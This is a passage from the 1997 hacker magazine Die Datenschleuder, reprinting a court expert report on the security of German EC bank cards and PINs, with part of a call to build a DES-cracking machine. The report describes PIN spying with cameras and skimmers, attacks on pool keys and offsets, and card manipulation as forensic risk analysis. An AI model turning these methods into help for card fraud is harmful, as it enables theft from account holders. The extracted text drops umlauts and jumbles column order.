lich zu lsen. Nach 2 Wochen Diskussionhaben wir uns zmd. von jeglichenselberlten-Lsungen entfernt undOutsourcing von Teilaufgaben (Hardware) alssinnvoll befunden.
Wo das Geld hernehmen?
Um es gleich klarzustellen: die Aktion ndetin Kooperation mit Verbraucherschutz-verbnden und Rechtsanwlten statt umunzweifelhafte legale Aktivitt im Sinne desVerbraucherschutzes sicherzustellen. Es geht
neben der ffentlichen Beleuchtung der EC-Kartenproblematik natrlich auch darum,auch dem letzten DAU klarzumachen, dader 56bit-DES unsicher ist; denn die Geheim-dienste haben lngst Maschinen um denkompletten 56bit-Keyspace in weniger als 10Sekunden durchzurechnen und so trotzBrute-Force effektiv zu arbeiten. Der BNDetwa betreibt zwei solcher Rechner (ThinkingMachine Corporation). Im Grunde wirft dieFreigabe von 128bit-Schlsseln (IDEA) durchdie Amerikaner (siehe Meldung in dieser DS)schon ganz andere Fragen bezglich geheim-dienstlicher Aktivitten auf.In Vorgesprchen mit entsprechenden Stellenhaben wir bereits Kooperationsbereitschaftzugesichert bekommen. Fr konkreteAquisearbeit sollte natrlich das technischeRealisierungskonzept stehen.
Denkbar ist technisch auch die Realisierungdes von Michael J. Wiener bereits 1993
beschriebenen Efcient DES Key SearchMaschinchens. Die Diskussion ist hiermiterffnet. Fr Anregung, technische Hinweise
und sonstige Form der Mitarbeit sind wirdankbar.Andy Mller-Maguhn, [email protected]
(1) siehe Diskussion in de.org.ccc(2) ist in der Newsgroup de.org.ccc bzw. kann bei mirper mail angefordert werden
(3) ala Card Ausgabe 20-21/1997 Seite 254d: [...] ver-einbart, da uerungen zu diesem Thema nur vomZentralen Kreditausschu kommen [...].
(4) das ZKA faxte uns trotz telefonischer Zusage dieStellungnahme nicht zu, daher Zitate ebenfallsentnommen aus der ala Card Ausgabe 20-21/1997
-
8/9/2019 Datenschleuder #59
13/32
4.4.3 Komponente: Magnetstreifenkarte
4.4.3.1 Produktionsfehler4.4.3.2 Kartendaten
4.4.3.3. Verknpfte Sicherheit/MM
4.4.3.4. Persnliche Geheimzahl/PIN
4.5 Methoden
4.5.1 Aussphung
4.5.1.1 Passive Aussphung
4.5.1.2 Aktive Aussphung
4.5.2 Ermittlung4.5.2.1 Durch Abfangen
4.5.2.2 Empirische Ermittlung per PIN
4.5.2.3 Die mathematische Ermittlung
4.5.2.4 Die elektronische Ermittlung
4.5.3 Manipulation
5. Zusammenfassung der Risikoanalyse
6. Beantwortung der Beweisfragen
7. Erklrung des Sachverstndigen
1. Auftrag
...
Der relevante Teil des Beweisbeschlusses lau-tet:
a) Unter welchen Voraussetzungen und mitwelchem zeitlichen Aufwand lt sich diePIN einer gestohlenen ec-Karte von einemTter ermitteln?
b) Ist es dabei denkbar, da ein Tter dieseinnerhalb von 30 Minuten herausndet, gege-
benfalls mit Hilfe von Erkenntnissen auseinschlgigen Vortaten, um welcheVorkenntnisse mte es sich dabei handeln?`
...
Gutachten 94 22 / 03
vom 25. Februar 1997
Begutachtung der Sicherheit einer EC-CARD
Im Rechtsstreit < > / Deutsche Postbank AG
vor dem Oberlandesgericht Hamm
Az.: 31 U 72 / 96
Gutachter:
Prof. Dr. Dipl.-Ing. Manfred Pauschvon der Industrie- und Handelskammer Darmstadtffentlich bestellter und vereidigter Sachverstndigerfr Informationsverarbeitung im aufmnnischen undadministrativen Bereich (Kleinrechner-Systeme)
Inhaltsverzeichnis
1. Auftrag
2. Beweislage
3. Ausgangslage
4. Risikoanalyse4.1 Personen-Kategorien
4.1.1 Mitarbeiter
4.1.2 Vertragspersonal
4.1.3. Systemberechtigte Teilnehmer
4.1.4 Systemfremde Teilnehmer
4.2 Zahlungssystem
4.3 Komponenten
4.4 Risiken
4.4.1 Komponente: GAA/POS-Terminal
4.4.1.1 Konstruktive Mngel
4.4.1.2 Aufstellungsort
4.4.1.3 berwachung
4.4.1.4 Automatenraub
4.4.2 Programme und Netze
4.4.2.1 Verrat und Korruption
4.4.2.2 Programmfehler
4.4.2.3 Netzsicherheit
Die Datenschleuder
Nummer 59, Juni 1997
Gutachten 9422/ 03
-
8/9/2019 Datenschleuder #59
14/32
Wahrscheinlichkeit die richtige PIN zufllig
einzugeben, falsch. Tatschlich gibt es bei ec-Karten nur die Zahlen von 1000 bis 9999. Beidrei Versuchen ergbe sich damit ausLaiensicht eine Wahrscheinlichkeit von1:3000. Wenn man jedoch wei, da bestimm-te Ziffern in der PIN huger vorkommen alsandere, so erhht sich die Wahrscheinlichkeitauf 1:682 (1). Ein Experte, der auch noch dieauf der Karte bendlichen Offsets bercksich-tigt, bringt es sogar auf ca. 1:150 (2). Da dieDIN/ISO 4909, die die Organisation derwichtigen Spur 3 auf ec-Karten beschreibt,
jedermann zugnglich ist und auch in einerHackerzeitung (3) verffentlicht wurde, mudieses Fachwissen auch einschlgigenTterkreisen unterstellt werden.
Die ungesicherte Erkenntnislage in diesemFall erzwingt deshalb zuerst eineRisikoanalyse des automatisiertenZahlungssystems, damit das Gericht einenberblick ber die vielfltigen Methoden desKartenmibrauchs gewinnen und diesegewichten kann, bevor die Beweisfragen imeinzelnen beantworten werden knnen.
Die Darstellung der komplexenZusammenhnge soll anhand desdargestellten Schaubildes erfolgen.
4. Risikoanalyse
Fr alle kryptographischen Verfahren mugelten, da ihre Sicherheit nur auf derGeheimhaltung der verwendeten Schlssel
beruhen darf, nicht aber auf derGeheimhaltung der angewandten Verfahren.Eine Geheimhaltung der Verfahrenimplementiert, da Auenstehende dieSicherheit des Systems durchbrechen knnen,also reale Sicherheitslcken.Die Kryptologie als Spezialgebiet derMathematik / Informatik wird im Hinblickauf Sicherheit und Vertrauenswrdigkeit derautomatisierten Systeme in unserer fortschrei-tenden Informationsgesellschaft einsteigender Stellenwert zukommen. Ihre Rollemu deshalb der ffentlichen und politischenDiskussion unterworfen werden.
Die Verantwortung fr die Sicherheit desheutigen automatisierten Zahlungssystems
obliegt der Kreditwirtschaft. Sie hat den
Die Datenschleuder
Nummer 59, Juni 1997
EC-Karten Unsicherheit
3. Ausgangslage
Mit der Magnetkarte fehlt ein extremwichtiges Beweismittel, das einSachverstndiger einer umfangreichen, u.U.prozeentscheidenden, forensischerUntersuchung unterziehen kann. ... Durch diederzeitige Unmglichkeit einer Begutachtungder streitbefangenen Magnetkarte kann nicht
bewiesen werden, ob die Kartendatenmanipuliert worden sind.
Insbesondere kann nicht festgestellt werden,ob der Fehlbedienungszhler zurckgesetztworden ist. Es gibt also keine gesichertenErkenntnisse fr die Behauptung derBeklagten, da der Tter beim ersten Versuch
bereits die richtige PIN eingegeben hat. Es istsehr wohl denkbar, da auch an anderenAutomaten bereits Versuche unternommenwurden, die bisher nicht zur Kenntnis desGerichts gebracht worden sind.
Nach Aktenlage ist auch nicht zu erkennen,ob berhaupt eine Prfung der PIN amGeldausgabeautomaten vorgenommenworden ist. Die vorgelegten Buchungsbelege
zum Konto des Klgers sind dazu nichtgeeignet. (Auf dieser Grundlage allein knnteauch eine simple Fehlbuchung bei derBeklagten durch falsche Kontozuordnungnicht ausgeschlossen werden.) Hierber kannnur das Transaktionsprotokoll, das denVerkehr zwischen dem Automaten und demRechenzentrum aufzeichnet, in Verbindungmit dem Kontrollstreifen des AutomatenAuskunft geben. Diese Dokumente liegen derAkte aber nicht bei.
Es ist also gar nicht sicher, da der Automat
zum Zeitpunkt der streitgegenstndlichenAbhebung online, d.h. mit demRechenzentrum in Verbindung war. Auch istnicht ersichtlich, ob eine MM-Prfungvorgenommen worden ist. Es knnte auch einHardware- oder Software-Fehler vorgelegenhaben. Hierber kann nur die Auswertungder Dokumente durch einenSachverstndigen Auskunft geben.
Die von der Beklagten vorgelegten Gutachter
der Gutachter Haverkamp und Dr. Heuser(BI. 66 und 157 d.A.) sind bezglich der
-
8/9/2019 Datenschleuder #59
15/32
zentralen Sicherheitsbereich
Schlsselmanagement nach dem durch denStand der Technik vorgebenen Standard zuorganisieren. Dieser Bereich desSicherheitsrisikos wird in der nachfolgendenRisikoanalyse des automatisiertenZahlungssystems nicht bercksichtigt. DieUntersuchung konzentriert sich vielmehr aufden durch die Einwirkung durch Dritte
begrenzten Hard- und Softwarebereich, weildie sogenannten Phantomabhebungen inder Mehrzahl hiermit erklrt werden knnen.(Solange die genauen Methoden der
behaupteten unberechtigten Kontenzugriffenicht eindeutig feststehen, hat es sich in derFachliteratur eingebrgert, vonPhantomabhebungen zu sprechen.)
Bei der Beschreibung der im Schaubild darge-stellten Elemente ... folgt der Sachverstndigeder dort verwendeten Bezeichnung undOrdnung. ...
4.4.3.4 Persnliche Geheimzahl PIN
Es werden verschiedene Verfahren zurGenerierung einer PIN angewandt (16). Frdie Abschtzung des Sicherheitsrisikos kannman sich jedoch auf den Kern, das allseitsverwendete DES-Verschlsselungsverfahren,
beschrnken.
Dieses soll durch das Fludiagramm auf derfolgenden Seite veranschaulicht werden.Darin ist zur besseren Verstndlichkeit die iminstitutsinternen Verfahren benutzte PIN alsnatrliche, die im institutsbergreifendenVerfahren benutzte PIN als endgltige PIN
bezeichnet.
4.5. Methoden
Grundstzlich gilt: Was verschlsselt werdenkann, kann auch wieder entschlsseltwerden. Die Methode, wie man zu einer PINkommt, die zu einer fremden Magnetkartegehrt, ist nur eine Frage des Aufwandes,also der Zeit, der Kosten und dervorhandenen Ressourcen.
4.5.1 Aussphung
4.5.1.1. Passive Aussphung
Die Datenschleuder
Nummer 59, Juni 1997
Gutachten 9422/ 03
Die Aussphung ist die mit Abstand
verbreitetste Methode, an eine fremde PIN zukommen. Es kann an Geldausgabeautomaten,besonders in verkehrsreichen Zonen, oderPOS-Systemen in Kaufhusern undTankstellen hug beobachtet werden, dasich Dritte im unmittelbaren Einsichtsbereichder Tastatur aufhalten und so die PIN ohneweitere Hilfsmittel optisch erkennen knnen(Pfad 5.1 - 5.1.1. - 5.1.3. - 5.1.5). Diekonstruktiven Merkmale fast aller inGebrauch bendlicher GAA untersttzen die-se Methode in nahezu stricher Weise.Abhilfe ist mit einfachsten Mitteln sehrwirksam zu schaffen. Hug fehlt demlegalen Bediener des GAA aber auch dasBewutsein fr eine mgliche Aussphung,sei es da der/die Dritte Freund/Freundinoder Verwandter/Verwandte ist, denensolche Absicht nicht unterstellt wird, oder seies, da er (besonders ltere Leute) dieMglichkeit des Aussphens unterschtzt.Fr diese Methode gibt es in der praktischenErfahrung des Autors als Sachverstndigereine Vielzahl von Beispielen, die aber hierwegen ihre Offenkundigkeit nicht einzeln
vorgestellt werden sollen.Trotzdem mssen die Erfolgschancen der ein-fachen optischen Aussphung untersuchtwerden. Wenn bei einem Touchscreen-GAAvier Abdrcke ohne Reihenfolge der Eingabezu erkennen sind, so wird durchsystematisches Ausprobieren sptestens im24. Versuch die richtige PIN ermittelt.Statistisch gesehen betrgt die Chance 1:12.Bei drei zulssigen Eingabeversuchen wrdeauf diese Weise fr jede vierte (gestohlene)Karte die richtige PIN eingegeben werden
knnen. Eine wahrlich gute Trefferquote!4.5.1.2. Aktive Aussphung
Aus Norwegen, Schweden und England sindFlle (17) bekannt, in denen kriminelleVereinigungen Wohnungen gegenber vonGAA in verkehrsreichen Zonen angemietethatten. Von dort sphten sie mit Fernglsern
bzw. Kameras mit Teleobjektiven PIN aus(Pfad 5.1 - 5.1.2 - 5.1.4 - 5.1.5). Die Bedienerwurden anschlieend geziehlt bestohlen bzw.
beraubt und ihre Konten geplndert.
-
8/9/2019 Datenschleuder #59
16/32
mit dem Ergebnis der DES-Algorithmus-
Rechnung zu vergleichen.Bei institutsbergreifender Nutzung istfolgender Rechenvorgang anzuwenden:
Eingetastete persnliche Geheimzahl desKunden
- Ergebnis des DES-Algorithmus mitPoolschlssel
= jeweils gltiger Offset
oder
Ergebnis des DES-Algorithmus mitPoolschlssel
+ jeweils gltiger Offset
= vom Kunden eingetastete persnlicheGeheimzahl
Einer dieser Poolschlssel ist in einemHardware-Sicherheits-Modul (HSM) imGeldausgabeautomaten gespeichert. Bei derOFFLINE-Prfung verschlsselt der
GAA die Kartendaten mit dem Poolschlssel.Wenn das Ergebnis zusammen mit demPoolschlssel der vom Kunden eingebenenPIN entspricht, wird die Eingabe vom GAAakzeptiert.
Wie gro ist die Chance, die PIN zu erraten?Dazu mu man wissen, da es bei der PINnur 9000 Mglichkeiten gibt. Unterstellt man3 Versuche, bevor die Karte bei falscher PIN-Eingabe einbehalten wird, so ergibt sich inerster (laienhafter) Nherung eineWahrscheinlichkeit von 1:3000 = 0,00033.Statistisch korrekt ergibt sich fr das Erraten
der PIN in drei Versuche unterBercksichtigung der Entropie jedoch eineWahrscheinlichkeit von 0,00044.
Wenn, z.B. durch Aussphung, bereits Teileder PIN bekannt sind, erhht sich dieWahrscheinlichkeit naturgementsprechend. Dabei kommt es aber daraufan, ob die erste und/oder eine dernachfolgenden Stellen der PIN bekannt sind.Denn in der PIN kommen nicht alle Zifferngleich hug vor. Bestimmte Ziffern knnen
z.B. nicht in der ersten Stelle der PINvorkommen.
Die Datenschleuder
Nummer 59, Juni 1997
EC-Karten Unsicherheit
Eine auch in Deutschland verbreitete Variante
dieser Methode ist das Anbringen von Mini-Videokameras (18) (54*54*34 mm), die dieBilder per Funk ber eine Strecke bis zu 400mbertragen. Die entsprechende betriebsfertigeAusrstung (Minikamera und Monitor) ist imElektronikhandel - natrlich nicht fr diesenZweck - fr weniger als 1.000,- DM erhltlich(Anlage 2).
In einem anderen Fall benutzte in einer west-deutschen Grostadt ein Elektronik-Freakselbstgebaute Vorsatzgerte, die ernacheinander an verschiedene GAA anbrach-
te, und bertrug per Funk smtliche Datender Karten einschlielich zugehriger PIN
in seine Computer-Datenbank (19).Anschlieend plnderte er die Konten. DenKunden sind die Vorsatzgerte nicht aufgefal-len.
...
4.5.2.2 Empirische Ermittlung der PIN
Entgegen anderslautenden Behauptungen derKreditwirtschaft werden auch heute
(beweisbar) noch Geldausgabeautomatenhug ofine betrieben. Das mu auch alleinschon wegen der Wartungszeiten technischerEinrichtungen und zur Aufrechterhaltung desBetriebes bei Strungen der Fall sein. Beimofine-Verfahren wird ein Poolschlsseleingesetzt. Die Kartendaten sind deshalb beider Herstellung mit mehreren verschiedenenSchlsseln verschlsselt worden.
Die zugehrigen Offsets sind auf der Karteabgespeichert und knnen ausgelesenwerden.
Im deutschen ec-Geldautomatensystemwerden maximal 2 Schlssel vorrtiggehalten und wahlweise eingesetzt (21):
- Der Institutsschlssel, der zur Ermittlungund Prfung der persnlichen Geheimzahlder eigenen Kunden des Institutsherangezogen wird, das den ec-GA betreibt.
- Der Poolschlssel, der zur Ermittlung undPrfung der persnlichen Geheimzahl alleranderen Benutzer dient.
Bei institutsinterner Nutzung ist die vomKunden eingetastete persnliche Geheimzahl
-
8/9/2019 Datenschleuder #59
17/32
Schlssellnge aufmerksam gemacht. Die
aktuellere Schtzung dieser Wissenschaftlervom Januar 1996 ist nachstehend wiedergege-ben (24):
Nach heutigem Stand knnten selbst bei der10.000 $-Variante ASICS eingesetzt werden,ohne da sich die Kosten wesentlich erhhen.Unter dieser Vorraussetzung knnte dieSchlsselsuche in ca. 14 Tagen durchgefhrtwerden. (Falls die Spezialmaschine selbst ent-wickelt werden mu, gilt: Bei allen Variantenmssen noch die Entwicklungskosten inHhe von ca. 500.000 $ bercksichtigt
werden. Diese wurden bei Erstellung derTabelle von den Autoren offensichtlichvergessen.)
Da die Schlsselsuche mit der Wiener-Maschine nur ein einziges Mal fr jedenSchlssel durchgefhrt werden mu, ist dieVerarbeitungsgeschwindigkeit im Grunde beider Risikobetrachtung von nachgeordneterBedeutung. Der Tter mu auch nichtselbst die Schlsselsuche durchfhren . Es istherauszustellen, da die Schlsselsuche mitder Wiener-Maschine von anderen Personen,zu anderer Zeit und an anderem Ort durchge-fhrt werden kann. Wenn also einPoolschlssel mit der Wiener-Maschine in 14Tagen geknackt werden kann, so ist das beidiesen Investitionen ein lukratives Geschft.Denn die gefundenen Schlssel knnen anInteressierte verkauft werden, die dann mitkleinen Laptop-Computern in Sekunden dierichten PIN zu gestohlenen ec-Kartenerrechnen knnen. Bei dezenter Anwendung,die eine Entdeckung unwahrscheinlichmacht, bersteigt der Ertrag dieInvestition um ein Vielfaches.Es sei auerdem noch angemerkt, da dieKosten fr FPGAs und ASICs trotz des zurZeit hheren Dollarkurses seit der Erstellungder vorherstehenden Tabelle erheblich gesun-ken sind. Auch mu auf die PC-gesttzteZeit- und Kostenrechnung im Amateurbereichaufmerksam gemacht werden, die das Poten-tial der Tter nur auf dieser Basis vergleich-
bar machen kann. Das entspricht aber nichtden Gegebenheiten in Deutschland. Mit
leistungsfhigeren Rechnern (z.B. gebrauch-ten Grorechnern, die wegen der galop-
In Wirklichkeit ist die Chance dadurch grer
als der Laie vermutet, da manche Zahlen inder PIN huger vorkommen als andere. Mitdiesem Wissen betrgt die Chance, dierichtige PIN zu erraten, 1:682 = 0,00147. Mitdem Expertenwissen ber die Offsets kanndie Wahrscheinlichkeit sogar auf ca. 1:150 =0,00667 erhht werden.
4.5.2.3 Die mathematische Ermittlung der PIN
Die Kreditwirtschaft sttzt ihre Aussagebezglich der Sicherheit hug auf densogenannten Brute Force Attack und leitetdaraus den Zeitbedarf fr die Ermittlung desSchlssels von derzeit 1900 Jahren (22) PC-Rechenzeit ab.
Mit diesem Ansatz kann durchNachvollziehen der Verschlsselung der voll-stndige Schlssel eines kartenausgebendenInstitutes mit allen 56 wirksamen Stellenermittelt werden. Das erfordert natrlichselbst bei grozgigsten Ressourcen aufeinem PC immens viel Zeit.
Es sind auch spezielle Gerte undSchaltungen verffentlicht worden, mit denen
die Berechnung schneller erfolgt. Einedetaillierte Konstruktionsbeschreibung einersolchen Maschine hat der kanadischeKryptologe Michael J. Wiener von BellNorthern Research bereits 1993 vorgestellt(23). Da fr Kredit- und Bankkarten weltweitnahezu die selben Verschlsselungsverfahrenangewandt werden, kann die Wiener-Maschine auch sozusagen universelleingesetzt werden.
In Anbetracht dieser technischenEntwicklung kommt den bereits seitEinfhrung des DES-Verfahrensvorgetragenen Bedenken ber eineausreichende Schlssellnge wachsendeBedeutung zu. Die Schlssellnge von 56 bit
beruht nicht nur auf der damaligen Kapazittder eingesetzten ICs, sondern ist nicht zuletzt darauf zurckzufhren, da dieamerikanischen Sicherheitsbehrden in derLage bleiben wollten, den mit dieserSchlssellnge codierten Datenverkehr leichtentschlsseln zu knnen.
Fhrende amerikanische Kryptologen habenbereits 1993 auf die unzureichende
Die Datenschleuder
Nummer 59, Juni 1997
Gutachten 9422/ 03
-
8/9/2019 Datenschleuder #59
18/32
Deutschland kann diese Mglichkeit nicht
ausgeschlossen werden. ErnstzunehmendeInformationen aus der Szene deuten daraufhin.
4.5.3 Manipulation
Manipulationen der auf der Magnetkarteabgespeicherten Daten zur Herstellung einesZustandes, mit dem die Akzeptanz einer
bestimmten oder aller PIN-Eingaben erreichtwerden sollen, lassen sich in der Mehrzahldurch forensische Untersuchungen der verur-sachenden Karte nachweisen (Pfad 5.3 - 5.3.1+ 5.3.2). Das hat der Sachverstndige inmehreren Fllen bewiesen. Die blicheVernichtung der Magnetkarte durch dasausgebende Kreditinstitut ist deshalb als wei-teres Risiko zu erwhnen. Das einfacheZerschneiden der Karte vernichtet nicht inallen Fllen die Daten, so da ein Fachmannhug noch Auswertungen vornehmen kann.
Es sind aber auch Flle bekannt (27), in denendie Betrger Vernderungen an denKartendaten vorgenommen haben, um
beispielsweise den Fehlbedienungszhler
zurckzusetzen, den Verfgungsrahmen zuvergrern oder die Gltigkeit zu erreichen.Auch das lt sich in der Regel anhand dereingezogenen Karte durch forensischeUntersuchungen nachweisen.
Darber hinaus sind viele Kombinationen dervorgestellten Methoden denk- und machbar.Auf die Entkoppelung von Zeit und Raum
bei der Aussphung mu besondershingewiesen werden, weil hierdurch dieAufklrung extrem erschwert wird.
Beispiel: Wenn ein Kunde bei der Eingabe sei-ner PIN in einer Tankstelle unbemerkt ausge-spht wird, so kann seine Identitt vom Tterin der Regel ber das KFZ-Kennzeichen oderdie Verfolgung seines Fahrzeugs festgestelltwerden. Es wurde berichtet, da dannAuftragsdiebe oder Auftragsruber nach eini-gen Tagen dem Auftraggeber (Ausspher) dieMagnetkarten beschafft haben, der dann dasKonto der Betroffenen ausplnderte. DerBetroffene wird sich in der Regel nicht mehran die Mglichkeit einer Aussphung in derTankstelle oder gar an den Tter errinern.
...
Die Datenschleuder
Nummer 59, Juni 1997
EC-Karten Unsicherheit
pierenden technischen Innovation dieser
Systeme nahezu verramscht werden) lassensich Kosten und Zeiten dramatisch senken.
Weil ein Dieb aber nur an der vierstelligenPIN interessiert ist, wird der Einzeltter inder Praxis die Investition scheuen. Es ist
jedoch durchaus vorstellbar, da sich interna-tionale Organisationen dieser Methode bedie-nen knnten, um alle PIN zu knacken.
Der Smart Attack (25) basiert mehr aufpragmatischer Methodik und nutzt allemathematischen Einschrnkungen und
Erleichterungen der realen Gegebenheiten(z.B. die Wertepaare sind nur fr wenigePunkte mathematisch deniert und die realeWerteche ist nur eine geringe Untermengeder mathematischen Gesamtmenge) sowiedas spezielle Verfahrens-Design zur Ermitt-lung vierstelligen PIN aus. Wie schon darge-legt erhht sich durch Einbeziehung der aufder Karte abgespeicherten Offsets die Chancefr den Experten, bei zufllig gewhltenKarten, bereits auf 1:150. Die Chancen ver-grern sich in der Praxis noch, weil derPoolschlssel seit langer Zeit nicht verndertwurde. Der Autor konnte im praktischenVersuch fr ein Amtsgericht die gesuchterichtige PIN bereits im 17. Versuch mittelsErhhung der Ordnung einer Spline-Funktionermitteln.
4.5.2.4 Elektronische Ermittlung der PIN
Das elektronische Abfangen von Datenwurde bereits unter Punkt 4.2.3(Netzsicherheit) errtert. An dieser Stelle solldeshalb auf die Ermittlung der PIN unterVerwendung von Originalteilen aus GAA ein-
gegangen werden.Aufgrund der Ofine-Struktur des deutschenGAA-Systems sind die Mglichkeiten derErrechnung und Prfung der PIN im GAAeingebaut. Aus Skandinavien ist ein Fall
bekannt (26), in dem diese Komponenten mitder GAA entwendet wurden. Die Diebe, dieber entsprechende Elektronik-Kenntnisseverfgten, bauten daraus ein Gert, das beigegeben Kartendaten blitzschnell alle PIN-Nummern abfragte, bis die richtige gefunden
war. So konnte die unbekannte PIN inSekunden ermittelt werden. Auch in
-
8/9/2019 Datenschleuder #59
19/32
das der Benutzer zu tragen hat oder ob das
Risiko nach dem Stand der Technik mitvertretbarem Aufwand verringert werdenkann. Der Sachverstndige ist derAuffassung, da das Risiko durch einfachsteManahmen drastisch reduziert werdenkann, z.B. durch Sichtschutz zurErschwerung der Aussphung
...
Es ist auch wichtig, die Zugangsmglichkeitzu den beschrieben Verfahren abzuwgen.Das heit, wie hoch sind die Investitionenund ber welche Qualikationen men dieTter verfgen? Nur nach Beantwortungdieser Fragen lt sich entscheiden, ob man
bei jedem in der Kriminalstatistikaufgefhrten Kartenmibrauchsfall dieVortuschung einer Straftat annehmen mu.
Bereits fr 49,50 DM bietet in bekannterElektronik-Handel Codierstationen aus DDR-Bestnden (Anlage 3).Mit diesen(fabrikneuen)Gerten knnen Magnetkarten hergestellt,dupliziert, manipuliert und gelesen werden.Die zugehrige Software ist als ausfhrlichesListing in einer Elektronikzeitschriftverffentlicht worden (Bl 24 ff d.A.) Was jedeStelle der Magnetspur einer ec-Karte
bedeutet, kann man in einer Hackerzeitungnachlesen (Bl. 19 d.A. sowie Anlage 4), wennman nicht Zugang zu einer DIN/ISO 4909hat.
ber die notwendigen Eingangsqualikatio-nen verfgen mindestens alle Computer-Freaks, Technik- und Informatikstudenten.Die Vorleistungsinvestitionen scheinennicht unberwindlich. Man darf deshalb einausreichendes Tterpotential vermuten.
6. Beantwortung der Beweisfragen
Es wurde in der Analyse mehrereMglichkeiten aufgezeigt, wie unberechtigteTter in krzester Zeit Kenntnis einer PINerlangen knnen. Das Gericht mge
bewerten, ob eine der vorgestellten Methodenin diesem Rechtsstreit mit berzeugenderWahrscheinlichkeit angewandt worden seinkann. Wegen der Unmglichkeit einerforensischen Untersuchung der Magnetkarteknnen durch den Sachverstndigen nur die
unter den gesicherten Umstnden technisch
Es ist auch naheliegend, da die Ende 1995 in
den Niederlanden von Unbekannten mitKartenkopien gettigten Abhebungenzulasten Banken in Jlich und Hckelhoven(28), auf die gleichzeitige Anwendung mehre-rer der vorgestellen Methoden zurckgefhrtwerden kann. Es kann nicht ausgeschlossenwerden, da hier die PIN von ca. 100 Kundenmittels einer Minivideokamera unbemerktausgespht und die Kartendaten mit einemelektronischen Vorschaltgert erfat wordensind. In diesem Fall beluft sich dieSchadenssumme auf ca. 300.000,- DM. InAnbetracht der besonderen Umstnde habendie Banken allerdings die Kundenentschdigt.
5. Zusammenfassung der Risikoanalyse
Vorstehend weurde eine systematischeRisikobetrachtung fr den automatisiertenZahlungsverkehr mit Magnetkartenvorgestellt. Die Quantizierung deraufgezeigten Risiken kann nicht verbindlichvorgenommen werden. Dunkelziffern sindnicht bekannt. Gemessen an der Zahl der inder Kriminalstatistik (29) dokumentierten
Flle beinhaltet die Sammlung desSachverstndigen nur eine uerst geringeMenge. Diese wird allerdings durch laufendeErfassung stndig aktualisiert.
...
Einige der vorgestellen Methoden sind soerfolgreich, da entgegengehalten werdenkann, wenn diese Verfahren tatschlich in derPraxis angewandt wrde, htte es einen nichtzu bersehenden Effekt hervorgerufen.Dieser sei aber bisher nicht erkennbar.
Tatschlich erhebt sich aber hier die Fragenach dem intellektuellen Potential der Tter.In Anbetracht der schwerwiegenden Materiekann es ein gefhrlicher Trugschlu sein,wenn die Gentleman-Tter auf das Niveauherkmmlicher Geldschrankknacker des Ede-Typs reduziert werden.
...
Es lt sich auch beim automatisiertenZahlungssystem, wie bei jedem anderen tech-nischen System, nicht leugnen, da es
risikobehaftet ist. Die Frage ist nur, ob es sichum das unvermeidbare Restrisiko handlet,
Die Datenschleuder
Nummer 59, Juni 1997
Gutachten 9422/ 03
-
8/9/2019 Datenschleuder #59
20/32
Tatumstnde von allen bekannten Varianten
die hchste Wahrscheinlichkeit zuunterstellen.
zu 2:
Die Magnetkarte der Klgers kann auch mitProduktionsfehlern behaftet gewesen sein,die die Eingabe einer beliebigen PINerlauben. Ein solches Verhalten ist inmehreren aufgetretenen Fllen dokumentiert,so da es auch in diesem Fall nichtausgeschlossen werden kann. Es ist fr dieBeurteilung von hypothetischem Wert, ob dasVerhalten als Karten- oder Programmfehlerangesehen wird. Darber hinaus knnen dieentwendete ec-Karte des Klgers auch vondem Tter mit diesem Ziel verndert wordensein. Da die Karte aber nicht forensisch unter-sucht werden kann, bleiben alle AussagenVermutungen.
Weil aber auch keine Transaktionsprotokolleund Protokollstreifen der GAA / POSvorgelegt wurden, lt sich nicht feststellen,ob die PIN berhaupt im Rahmen derunberechtigten Abhebungen geprft worden
ist.Wegen der derzeit nicht mglichenAuswertung der entwendeten ec-Karte desKlgers kann auch nicht ber die Historie derVerwendung dieser Karte festgestellt werden.
zu 3:
Selbst wenn zur Tatzeit ein Programmfehlerin der Systemsoftware der Beklagten nichtvorhanden war, lt sich dieser heute nichtmehr feststellen, weil die Beklagte nach derErfahrung des Sachverstndigen auch
gerichtsbeauftragten Externen kategorisch dieInformation hierber verweigert.
Die Frage nach der Betriebsart desZahlungssystems der Beklagten zumTatzeitpunkt kann der Sachverstndigederzeit nicht beantworten, weil dievorgelegten Kontoauszge hierber nichtaussagen. Erst nach Prfung der relevantenTransaktionsprotokolle und derKontrollstreifen der betroffenen GAA undPOS knnen hierzu gutachterlicheFeststellungen getroffen werden.
Frage:
Die Datenschleuder
Nummer 59, Juni 1997
EC-Karten Unsicherheit
unmglichen Methoden ausgesondert
werden. Bei den briggebliebenen kann derSachverstndige weder eine Mglichkeitausschlieen noch beweisen.
Frage:
a) Unter welchen Vorraussetzungen und mitwelchem zeitlichen Aufwand lt sich diePIN einer gestohlenen ec-Karte von einemTter ermitteln?
Antwort:
Da der Klger angibt, seinen PIN-Brief sofortnach Empfang vernichtet zu haben und auchdie PIN inzwischen vergessen und niemalseinen Geldausgabeautomaten benutzt zuhaben, scheiden alle Mglichkeiten einerAussphung aus.
Denkbar bleiben somit die Mglichkeiteneiner Ermittlung der PIN (1), einerManipulation der Magnetkarte (2) oder einesSystemfehlers (3) in Form einesProgrammfehlers (Betriebssystem) bzw.aufgrund der Betriebsart (online/ofine).
zu 1:
Wegen der langen Zeit seit Versendung desPIN-Briefes an den Klger ist Mglichkeit desAbfangens dieses Briefes auf dem Postwegnahezu ausschlieen.
Bei der empirischen Ermittlung der PINdurch Ausprobieren ist die hchsteErfolgswahrscheinlichkeit mit 1:150 anzuneh-men.
Wie im Rahmen der Risikoanalyse dargelegt,ist die Wahrscheinlichkeit einer rechnerischenErmittlung der PIN nach der Methode Brute
Force Attack oder Smart Attack geringer.Es kann aber nicht mit letzter Sicherheitausgeschlossen werden, da es noch andere,effektivere rechnerischer Methoden zurErmittlung der PIN gibt, von denen derSachverstndige zur Zeit noch keine Kentnishat.
Setzt man vorraus, da auchSystemkomponenten aus einem (geraubten)GAA verwendet worden sein knnten, so istdie schnelle und richtige Ermittlung der PINzur Karte des Klgers nicht von der Hand zu
weisen. Dieser Methode ist in Anbetracht der
-
8/9/2019 Datenschleuder #59
21/32
(25) Manfred Pausch: Gutachten fr AG Darmstadt 38
C 4386/87, 10.07.1988(26) Ivar Kamsvag: Slik kan en minibank knekkes
Computerworld Norge, 1/1993 S. 4-5, 15.01.1993
(27) NDR Ratgeber Technik: Archiv Ammann,
Lehnhardt, Leptihn
(28) Westdeutsche Allgemeine Zeitung: Geldautomat
kopiert den Magnetstreifen, 12.01.1996
(29) Bundeskriminalamt, Kriminalistisches Institut,
Ref. Kl 12: Computerkriminalitt 1995 in der
polizeilichen Kriminalstatistik (PKS):
